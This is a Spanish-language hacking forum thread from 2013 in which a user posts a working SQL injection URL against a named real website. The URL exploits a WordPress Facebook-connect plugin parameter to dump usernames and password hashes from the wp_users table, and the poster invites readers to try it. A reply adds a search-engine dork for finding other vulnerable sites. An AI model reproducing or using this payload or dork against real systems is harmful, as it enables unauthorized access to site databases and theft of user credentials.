Sólo texto | Texto con Imágenes

Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: TeNeX en Abril 28, 2013, 05:30:08 PM

Título: Inyeccion sql
Publicado por: TeNeX en Abril 28, 2013, 05:30:08 PM
buenas, quiero compartir con ustedes como una inyección por get puede arrojar usuarios de worpress

http://www.yurem.com.mx/blog/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+%20select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29%20z%E2%80%8B0mbyak,7,8,9,10,11,12+from+wp_users--

arrojará en la propia web el usuario y el hash :) no pude subir el screen del sitio pero pruebenlo :)
Título: Re:Inyeccion sql
Publicado por: StuXn3t en Abril 28, 2013, 06:45:50 PM
Interesante el aporte, gracias por compartir...

Saludos!  :)
Título: Re:Inyeccion sql
Publicado por: |şSɘŬ en Abril 28, 2013, 07:23:49 PM
Lo encontraste tu?
Dork: inurl:"?fbconnect_action=myhome"
Sólo texto | Texto con Imágenes